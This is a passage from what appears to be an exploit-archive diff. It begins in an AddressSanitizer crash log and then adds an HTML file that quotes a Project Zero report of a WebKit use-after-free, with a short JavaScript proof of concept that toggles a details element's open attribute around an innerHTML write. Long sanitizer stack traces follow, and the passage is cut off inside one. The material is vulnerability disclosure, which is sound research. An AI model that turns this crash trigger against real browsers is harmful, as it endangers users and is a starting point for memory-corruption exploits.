#21 0x10f06247d in JSC::JITCode::execute(JSC::VM*, JSC::ProtoCallFrame*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0xf7d47d)
#22 0x10efecaa3 in JSC::Interpreter::executeCall(JSC::ExecState*, JSC::JSObject*, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0xf07aa3)
#23 0x10e6de991 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x5f9991)
#24 0x10e6deabb in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x5f9abb)
#25 0x10e6dee06 in JSC::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x5f9e06)
#26 0x112d24b2e in WebCore::JSMainThreadExecState::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x10b2b2e)
#27 0x11300a786 in WebCore::JSEventListener::handleEvent(WebCore::ScriptExecutionContext*, WebCore::Event*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1398786)
#28 0x112565a05 in WebCore::EventTarget::fireEventListeners(WebCore::Event&, WTF::Vector<WTF::RefPtr<WebCore::RegisteredEventListener>, 1ul, WTF::CrashOnOverflow, 16ul>) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x8f3a05)
#29 0x11256552f in WebCore::EventTarget::fireEventListeners(WebCore::Event&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x8f352f)
previously allocated by thread T0 here:
#0 0x10c9b9790 in __sanitizer_mz_malloc (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.0.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib+0x4b790)
#1 0x7fff8ce465a0 in malloc_zone_malloc (/usr/lib/system/libsystem_malloc.dylib+0x25a0)
#2 0x10f9efdb4 in bmalloc::DebugHeap::malloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x190adb4)
#3 0x10f9e512b in bmalloc::Allocator::allocateSlowCase(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x190012b)
#4 0x10f97c995 in bmalloc::Allocator::allocate(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x1897995)
#5 0x1128b17c0 in WTF::VectorBufferBase<WebCore::FormAssociatedElement*>::allocateBuffer(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc3f7c0)
#6 0x1128b1ae3 in WTF::Vector<WebCore::FormAssociatedElement*, 0ul, WTF::CrashOnOverflow, 16ul>::reserveCapacity(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc3fae3)
#7 0x1128c8383 in WTF::Vector<WebCore::FormAssociatedElement*, 0ul, WTF::CrashOnOverflow, 16ul>::expandCapacity(unsigned long, WebCore::FormAssociatedElement**) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc56383)
#8 0x1128c48f0 in void WTF::Vector<WebCore::FormAssociatedElement*, 0ul, WTF::CrashOnOverflow, 16ul>::insert<WebCore::FormAssociatedElement*&>(unsigned long, WebCore::FormAssociatedElement*&&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc528f0)
#9 0x1128c4770 in WebCore::HTMLFormElement::registerFormElement(WebCore::FormAssociatedElement*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc52770)
#10 0x11267b4d8 in WebCore::FormAssociatedElement::setForm(WebCore::HTMLFormElement*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa094d8)
#11 0x11267b79c in WebCore::FormAssociatedElement::insertedInto(WebCore::ContainerNode&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa0979c)
#12 0x1129386c3 in WebCore::HTMLObjectElement::insertedInto(WebCore::ContainerNode&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xcc66c3)
#13 0x112019476 in WebCore::notifyNodeInsertedIntoDocument(WebCore::ContainerNode&, WebCore::Node&, WTF::Vector<WTF::Ref<WebCore::Node>, 11ul, WTF::CrashOnOverflow, 16ul>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x3a7476)
#14 0x112019318 in WebCore::notifyChildNodeInserted(WebCore::ContainerNode&, WebCore::Node&, WTF::Vector<WTF::Ref<WebCore::Node>, 11ul, WTF::CrashOnOverflow, 16ul>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x3a7318)
#15 0x112008c77 in WebCore::ContainerNode::notifyChildInserted(WebCore::Node&, WebCore::ContainerNode::ChildChangeSource) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x396c77)
#16 0x11200769a in WebCore::ContainerNode::parserAppendChild(WebCore::Node&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x39569a)
#17 0x11285d09c in WebCore::executeInsertTask(WebCore::HTMLConstructionSiteTask&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xbeb09c)
#18 0x112856007 in WebCore::HTMLConstructionSite::executeQueuedTasks() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xbe4007)
#19 0x112886d48 in WebCore::HTMLDocumentParser::constructTreeFromHTMLToken(WebCore::HTMLTokenizer::TokenPtr&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc14d48)
#20 0x112886902 in WebCore::HTMLDocumentParser::pumpTokenizerLoop(WebCore::HTMLDocumentParser::SynchronousMode, bool, WebCore::PumpSession&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc14902)
#21 0x112885b94 in WebCore::HTMLDocumentParser::pumpTokenizer(WebCore::HTMLDocumentParser::SynchronousMode) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc13b94)
#22 0x11288758d in WebCore::HTMLDocumentParser::append(WTF::RefPtr<WTF::StringImpl>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc1558d)
#23 0x1122f4661 in WebCore::DecodedDataDocumentParser::flush(WebCore::DocumentWriter&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x682661)
#24 0x1124201f8 in WebCore::DocumentWriter::end() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x7ae1f8)
#25 0x1123e486f in WebCore::DocumentLoader::finishedLoading(double) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x77286f)
#26 0x111ec4fb7 in WebCore::CachedResource::checkNotify() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x252fb7)
#27 0x111ebfb69 in WebCore::CachedRawResource::finishLoading(WebCore::SharedBuffer*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x24db69)
#28 0x1144707e4 in WebCore::SubresourceLoader::didFinishLoading(double) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x27fe7e4)
#29 0x10acdf615 in void IPC::handleMessage<Messages::WebResourceLoader::DidFinishResourceLoad, WebKit::WebResourceLoader, void (WebKit::WebResourceLoader::*)(double)>(IPC::Decoder&, WebKit::WebResourceLoader*, void (WebKit::WebResourceLoader::*)(double)) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x8de615)
SUMMARY: AddressSanitizer: heap-use-after-free (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa55bdf) in WebCore::FormSubmission::create(WebCore::HTMLFormElement*, WebCore::FormSubmission::Attributes const&, WTF::PassRefPtr<WebCore::Event>, WebCore::LockHistory, WebCore::FormSubmissionTrigger)
Shadow bytes around the buggy address:
0x1c1800014710: 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa
0x1c1800014720: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fa
0x1c1800014730: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
0x1c1800014740: 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa
0x1c1800014750: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
=>0x1c1800014760: fa fa fa fa fa fa fa fa fd[fd]fd fd fd fd fd fd
0x1c1800014770: fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa
0x1c1800014780: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x1c1800014790: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
0x1c18000147a0: fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa
0x1c18000147b0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==1013==ABORTING
-->

170
platforms/multiple/dos/41812.html Executable file
View file

@ -0,0 +1,170 @@
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1097
There is a use-after-free security vulnerability in WebKit. The vulnerability was confirmed on a nightly version of WebKit. The PoC has also been observed to crash Safari 10.0.2 on Mac.
PoC:
=================================================================
-->
<script>
function go() {
d.open = false;
d.innerHTML = "foo";
d.open = true;
}
</script>
<body onload=go()>
<details id="d" open="true">
<div>foo</div>
<!--
=================================================================
ASan log:
=================================================================
==570==ERROR: AddressSanitizer: heap-use-after-free on address 0x607000065058 at pc 0x00010e035a8b bp 0x7fff59453d00 sp 0x7fff59453cf8
READ of size 8 at 0x607000065058 thread T0
#0 0x10e035a8a in WebCore::Node::parentNode() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xba8a)
#1 0x10e048c1a in WebCore::Node::parentElement() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1ec1a)
#2 0x10e38c621 in WebCore::ComposedTreeIterator::traverseNextInShadowTree() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x362621)
#3 0x10e3910d5 in WebCore::ComposedTreeIterator::traverseNext() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x3670d5)
#4 0x110816a53 in WebCore::Style::TreeResolver::resolveComposedTree() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x27eca53)
#5 0x110817306 in WebCore::Style::TreeResolver::resolve(WebCore::Style::Change) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x27ed306)
#6 0x10e724e7f in WebCore::Document::recalcStyle(WebCore::Style::Change) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x6fae7f)
#7 0x10e7259e3 in WebCore::Document::implicitClose() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x6fb9e3)
#8 0x10ea913a1 in WebCore::FrameLoader::checkCompleted() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa673a1)
#9 0x10ea8e8da in WebCore::FrameLoader::finishedParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa648da)
#10 0x10e7430ad in WebCore::Document::finishedParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x7190ad)
#11 0x10ec3d79d in WebCore::HTMLDocumentParser::prepareToStopParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc1379d)
#12 0x10e7d824c in WebCore::DocumentWriter::end() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x7ae24c)
#13 0x10e79c86f in WebCore::DocumentLoader::finishedLoading(double) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x77286f)
#14 0x10e27cfb7 in WebCore::CachedResource::checkNotify() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x252fb7)
#15 0x10e277b69 in WebCore::CachedRawResource::finishLoading(WebCore::SharedBuffer*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x24db69)
#16 0x1108287e4 in WebCore::SubresourceLoader::didFinishLoading(double) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x27fe7e4)
#17 0x107099615 in void IPC::handleMessage<Messages::WebResourceLoader::DidFinishResourceLoad, WebKit::WebResourceLoader, void (WebKit::WebResourceLoader::*)(double)>(IPC::Decoder&, WebKit::WebResourceLoader*, void (WebKit::WebResourceLoader::*)(double)) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x8de615)
#18 0x107098c2a in WebKit::WebResourceLoader::didReceiveWebResourceLoaderMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x8ddc2a)
#19 0x106a471f9 in WebKit::NetworkProcessConnection::didReceiveMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x28c1f9)
#20 0x10686a448 in IPC::Connection::dispatchMessage(std::__1::unique_ptr<IPC::Decoder, std::__1::default_delete<IPC::Decoder> >) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0xaf448)
#21 0x106873614 in IPC::Connection::dispatchOneMessage() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0xb8614)
#22 0x10bd53ab3 in WTF::RunLoop::performWork() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x18b6ab3)
#23 0x10bd55f1e in WTF::RunLoop::performWork(void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x18b8f1e)
#24 0x7fffa0f3c7e0 in __CFRUNLOOP_IS_CALLING_OUT_TO_A_SOURCE0_PERFORM_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation+0xaa7e0)
#25 0x7fffa0f1bf1b in __CFRunLoopDoSources0 (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation+0x89f1b)
#26 0x7fffa0f1b43e in __CFRunLoopRun (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation+0x8943e)
#27 0x7fffa0f1ae37 in CFRunLoopRunSpecific (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation+0x88e37)
#28 0x7fff92663934 in RunCurrentEventLoopInMode (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox+0x30934)
#29 0x7fff9266376e in ReceiveNextEventCommon (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox+0x3076e)
#30 0x7fff926635ae in _BlockUntilNextEventMatchingListInModeWithFilter (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox+0x305ae)
#31 0x7fff8e7e1df5 in _DPSNextEvent (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit+0x48df5)
#32 0x7fff8e7e1225 in -[NSApplication _nextEventMatchingEventMask:untilDate:inMode:dequeue:] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit+0x48225)
#33 0x7fff8e7d5d7f in -[NSApplication run] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit+0x3cd7f)
#34 0x7fff8e79f367 in NSApplicationMain (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit+0x6367)
#35 0x7fff99c6e193 in _xpc_objc_main (/usr/lib/system/libxpc.dylib+0x11193)
#36 0x7fff99c6cbbd in xpc_main (/usr/lib/system/libxpc.dylib+0xfbbd)
#37 0x1067a7b73 in main (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent.Development+0x100001b73)
#38 0x7fff9db6e5ac in start (/usr/lib/system/libdyld.dylib+0x35ac)
0x607000065058 is located 24 bytes inside of 72-byte region [0x607000065040,0x607000065088)
freed by thread T0 here:
#0 0x108d76cf4 in __sanitizer_mz_free (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.0.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib+0x4bcf4)
#1 0x10bd9e36f in bmalloc::Deallocator::deallocateSlowCase(void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x190136f)
#2 0x10e3c24dd in WebCore::ContainerNode::removeChildren() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x3984dd)
#3 0x10fcb41f6 in WebCore::replaceChildrenWithFragment(WebCore::ContainerNode&, WTF::Ref<WebCore::DocumentFragment>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1c8a1f6)
#4 0x10e8bc6b9 in WebCore::Element::setInnerHTML(WTF::String const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x8926b9)
#5 0x10f3956ba in WebCore::setJSElementInnerHTMLFunction(JSC::ExecState&, WebCore::JSElement&, JSC::JSValue, JSC::ThrowScope&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x136b6ba)
#6 0x10f38701f in bool WebCore::BindingCaller<WebCore::JSElement>::setAttribute<&(WebCore::setJSElementInnerHTMLFunction(JSC::ExecState&, WebCore::JSElement&, JSC::JSValue, JSC::ThrowScope&)), (WebCore::CastedThisErrorBehavior)0>(JSC::ExecState*, long long, long long, char const*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x135d01f)
#7 0x10ababb58 in JSC::callCustomSetter(JSC::ExecState*, bool (*)(JSC::ExecState*, long long, long long), bool, JSC::JSValue, JSC::JSValue) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x70eb58)
#8 0x10ababc85 in JSC::callCustomSetter(JSC::ExecState*, JSC::JSValue, bool, JSC::JSObject*, JSC::JSValue, JSC::JSValue) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x70ec85)
#9 0x10b58ef95 in JSC::JSObject::putInlineSlow(JSC::ExecState*, JSC::PropertyName, JSC::JSValue, JSC::PutPropertySlot&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x10f1f95)
#10 0x10b743223 in llint_slow_path_put_by_id (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12a6223)
#11 0x10b75ebfd in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12c1bfd)
#12 0x10b76226c in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12c526c)
#13 0x10b75b83a in vmEntryToJavaScript (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12be83a)
#14 0x10b41a47d in JSC::JITCode::execute(JSC::VM*, JSC::ProtoCallFrame*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0xf7d47d)
#15 0x10b3a4aa3 in JSC::Interpreter::executeCall(JSC::ExecState*, JSC::JSObject*, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0xf07aa3)
#16 0x10aa96991 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x5f9991)
#17 0x10aa96abb in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x5f9abb)
#18 0x10aa96e06 in JSC::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x5f9e06)
#19 0x10f0dcb2e in WebCore::JSMainThreadExecState::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x10b2b2e)
#20 0x10f3c2786 in WebCore::JSEventListener::handleEvent(WebCore::ScriptExecutionContext*, WebCore::Event*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1398786)
#21 0x10e91da05 in WebCore::EventTarget::fireEventListeners(WebCore::Event&, WTF::Vector<WTF::RefPtr<WebCore::RegisteredEventListener>, 1ul, WTF::CrashOnOverflow, 16ul>) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x8f3a05)
#22 0x10e91d52f in WebCore::EventTarget::fireEventListeners(WebCore::Event&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x8f352f)
#23 0x10e80c431 in WebCore::DOMWindow::dispatchEvent(WebCore::Event&, WebCore::EventTarget*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x7e2431)
#24 0x10e81bc2f in WebCore::DOMWindow::dispatchLoadEvent() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x7f1c2f)
#25 0x10e72aaef in WebCore::Document::dispatchWindowLoadEvent() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x700aef)
#26 0x10e72588e in WebCore::Document::implicitClose() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x6fb88e)
#27 0x10ea913a1 in WebCore::FrameLoader::checkCompleted() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa673a1)
#28 0x10ea8e8da in WebCore::FrameLoader::finishedParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xa648da)
#29 0x10e7430ad in WebCore::Document::finishedParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x7190ad)
previously allocated by thread T0 here:
#0 0x108d76790 in __sanitizer_mz_malloc (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.0.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib+0x4b790)
#1 0x7fff933565a0 in malloc_zone_malloc (/usr/lib/system/libsystem_malloc.dylib+0x25a0)
#2 0x10bda7db4 in bmalloc::DebugHeap::malloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x190adb4)
#3 0x10bd9d12b in bmalloc::Allocator::allocateSlowCase(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x190012b)
#4 0x10bd34995 in bmalloc::Allocator::allocate(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x1897995)
#5 0x1109cd27d in WebCore::Text::create(WebCore::Document&, WTF::String const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x29a327d)
#6 0x1109cec56 in WebCore::Text::createWithLengthLimit(WebCore::Document&, WTF::String const&, unsigned int, unsigned int) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x29a4c56)
#7 0x10ec1336b in WebCore::HTMLConstructionSite::insertTextNode(WTF::String const&, WebCore::WhitespaceMode) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xbe936b)
#8 0x10ed72c3d in WebCore::HTMLTreeBuilder::processCharacterBufferForInBody(WebCore::HTMLTreeBuilder::ExternalCharacterTokenBuffer&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xd48c3d)
#9 0x10ed6d5a3 in WebCore::HTMLTreeBuilder::processCharacterBuffer(WebCore::HTMLTreeBuilder::ExternalCharacterTokenBuffer&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xd435a3)
#10 0x10ed6c531 in WebCore::HTMLTreeBuilder::processCharacter(WebCore::AtomicHTMLToken&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xd42531)
#11 0x10ed6967e in WebCore::HTMLTreeBuilder::constructTree(WebCore::AtomicHTMLToken&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xd3f67e)
#12 0x10ec3ed48 in WebCore::HTMLDocumentParser::constructTreeFromHTMLToken(WebCore::HTMLTokenizer::TokenPtr&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc14d48)
#13 0x10ec3e902 in WebCore::HTMLDocumentParser::pumpTokenizerLoop(WebCore::HTMLDocumentParser::SynchronousMode, bool, WebCore::PumpSession&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc14902)
#14 0x10ec3db94 in WebCore::HTMLDocumentParser::pumpTokenizer(WebCore::HTMLDocumentParser::SynchronousMode) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc13b94)
#15 0x10ec3f58d in WebCore::HTMLDocumentParser::append(WTF::RefPtr<WTF::StringImpl>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc1558d)
#16 0x10e6ac661 in WebCore::DecodedDataDocumentParser::flush(WebCore::DocumentWriter&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x682661)
